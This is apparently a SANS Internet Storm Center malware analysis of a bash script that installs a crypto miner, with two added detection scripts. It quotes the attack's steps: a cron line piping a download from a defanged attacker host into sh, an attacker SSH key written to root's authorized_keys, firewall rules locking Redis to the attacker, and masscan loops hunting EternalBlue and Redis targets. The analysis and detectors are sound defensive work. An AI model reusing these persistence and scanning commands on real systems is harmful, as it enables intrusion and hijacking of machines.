
Malicious Bash Script with Multiple Features - SANS Internet Storm Center


It's not common to find a complex malicious bash script. Usually, bash scripts are used to download a malicious executable and start it. This one was spotted by @michalmalik[1], who tweeted about it. I had a quick look at it. The script currently has a score of 13/50 on VT[2]. First of all, the script installs some tools and dependencies. Both 'apt-get' and 'yum' are used, which means that multiple Linux distributions are targeted. The following packages are installed: wget, git, make, python, redis-tools, gcc, build-essentials. Some Python packages are installed via PIP.

The primary goal of the script is to install a crypto miner. To optimize performance, the number of CPUs is tested:

if [ $cpunum -gt 4 ]; then
    threads=`expr $cpunum / 2`
fi

Three files are downloaded first:


'clay' is a known trojan[3]. 'minerd' is, as its name says, a crypto miner[4]. It is an x64 binary. 'glib-2.14.tar.gz' (SHA256: 18d9a0296260fd9529d59229c1dcb130ee8a18a1dd71c23712c39056cc0eb0b3) contains the libraries required by minerd. The crypto miner uses stratum+tcp://

Then crontab entries are added for persistence:

echo "*/5 * * * * curl -fsSL hxxp://xksqu4mj.fri3nds[.]in/tools/ | sh" > /var/spool/cron/root

The nasty part is the installation of the attacker's SSH key:

echo "ssh-rsa AAAAB3N ...[redacted]... Mq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys

I don't know why they add a key for the root user. By default, ssh does not allow root login. They should create a new user and add it to the 'sudo' group!
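The two persistence artefacts above (a cron job that pipes a remote download into a shell, and a key appended to root's authorized_keys) are easy to audit from copies of the files. The script below is an added example written for this diary, not code from the post or from the analysed malware; the sample crontab, key material and allow-list it builds are constructed, and the paths it reads are parameters, so it can be pointed at /var/spool/cron/root and /root/.ssh/authorized_keys collected from a suspect host.

```shell
#!/bin/sh
# Added example (not from the diary or the analysed script): flag a cron job
# that pipes a remote download into a shell and an authorized_keys entry that
# is not on an allow-list. File paths are parameters; nothing here touches
# the live system files.

# Print every cron line that fetches something with curl or wget and pipes
# the result into sh or bash (the "curl ... | sh" pattern from the diary).
find_pipe_to_shell_cron() {
    # $1: crontab file. grep exits 1 when nothing matches; that is not an error.
    grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)' "$1" || true
}

# Print "keytype comment" for every authorized_keys entry whose comment field
# is not listed in the allow-list file ($2, one approved comment per line).
find_unknown_keys() {
    # $1: authorized_keys file, $2: allow-list of key comments
    while read -r ktype _kdata kcomment; do
        case "$ktype" in
            ''|'#'*) continue ;;          # skip blank lines and comments
        esac
        if ! grep -qxF -- "$kcomment" "$2"; then
            printf '%s %s\n' "$ktype" "$kcomment"
        fi
    done < "$1"
}

# Demonstration on constructed input (hypothetical values, not real IoCs).
demo_dir=$(mktemp -d)
cat > "$demo_dir/cron" <<'EOF'
*/5 * * * * curl -fsSL http://example.invalid/tools/ | sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
EOF
cat > "$demo_dir/keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyData admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleKeyData root@host-10-10-10-26
EOF
printf 'admin@workstation\n' > "$demo_dir/allow"

echo "cron lines piping a download into a shell:"
find_pipe_to_shell_cron "$demo_dir/cron"
echo "authorized_keys entries not on the allow-list:"
find_unknown_keys "$demo_dir/keys" "$demo_dir/allow"
rm -rf "$demo_dir"
```

The key check compares only the comment field, which is enough to spot an entry nobody approved; a stricter version would allow-list the key data itself, since an attacker can reuse any comment.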

Then, access to Redis on port TCP/6379 is restricted with iptables (see below why):

PS3=$(iptables -L | grep 6379 | wc -l)
if [ $PS3 -eq 0 ]; then
    yum -y install iptables-services
    iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
    # the source address following -s is not shown on the page
    iptables -I INPUT 1 -p tcp --dport 6379 -s -j ACCEPT
    service iptables save
    /etc/init.d/iptables-persistent save
fi
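Because both rules are inserted at position 1, the ACCEPT inserted last ends up above the DROP: only the one source address can still reach Redis and every other client is dropped, which is what closes the door behind the attacker. The script below is an added example, not code from the diary, that reads `iptables -S INPUT` output (constructed here, with 192.0.2.10 as a stand-in for the redacted source) and reports that pattern.

```shell
#!/bin/sh
# Added example (not from the diary): list the rules on a TCP port in match
# order and flag an ACCEPT limited to a single source that sits above a
# catch-all DROP. Input is a file of `iptables -S INPUT` lines; on a live
# host it would be produced with: iptables -S INPUT > rules.txt

# Print "position action source" for every INPUT rule matching --dport $2.
redis_rules() {
    # $1: file with iptables -S output, $2: port number
    awk -v port="$2" '
        $1 == "-A" && $2 == "INPUT" && $0 ~ ("--dport " port "( |$)") {
            n++
            src = "any"; act = "?"
            for (i = 1; i <= NF; i++) {
                if ($i == "-s") src = $(i + 1)
                if ($i == "-j") act = $(i + 1)
            }
            print n, act, src
        }' "$1"
}

# Exit 0 when an ACCEPT restricted to a source address precedes a DROP that
# applies to everyone, i.e. the "only my host may talk to Redis" pattern.
has_private_allow() {
    # $1: file with iptables -S output, $2: port number
    redis_rules "$1" "$2" | awk '
        $2 == "ACCEPT" && $3 != "any" && !seen_drop { allow = 1 }
        $2 == "DROP"   && $3 == "any"               { seen_drop = 1; if (allow) found = 1 }
        END { exit (found ? 0 : 1) }'
}

# Demonstration on constructed rules (192.0.2.10 is a documentation address).
demo_dir=$(mktemp -d)
cat > "$demo_dir/infected" <<'EOF'
-P INPUT ACCEPT
-A INPUT -s 192.0.2.10/32 -p tcp -m tcp --dport 6379 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 6379 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
EOF
echo "rules on port 6379 in match order:"
redis_rules "$demo_dir/infected" 6379
if has_private_allow "$demo_dir/infected" 6379; then
    echo "WARNING: port 6379 is reachable from a single source only; all other clients are dropped"
fi
rm -rf "$demo_dir"
```

Printing the rules in match order is the point: `iptables -L` without `--line-numbers` hides why a DROP on 6379 still lets one host through.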

The next step is to download the 'masscan' port scanner and another bunch of scripts:


The tar file contains scripts which generate ranges of IP addresses and scan for hosts vulnerable to EternalBlue[4] (Windows hosts):

while read line; do
    masscan -p445 $line --rate=20000 | tee -a masscan
done < ip

For Linux hosts, Redis vulnerable instances are targeted:

while read line; do
    masscan -p6379 $line --rate=20000 | tee -a masscan
done < ip

The goal is to find new vulnerable hosts, pivot to them (lateral movement) and deploy the same script.

As a final note, some attackers are able to write "nice" code (read: malicious code) but they still fail to protect their resources. All their material is available via directory indexing:

Credit to finding the script goes to Michal Malik[6].


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

I will be teaching next: Reverse-Engineering Malware: Malware Analysis Tools and Techniques - SANS Amsterdam August 2022


697 Posts
ISC Handler
Mar 5th 2018
Is "ython" something or is there actually a missing "p" in one of those scripts? Makes you wonder how it happened...

23 Posts
It's a typo (probably introduced when I copied/pasted the code and formatted it to fit in the diary)
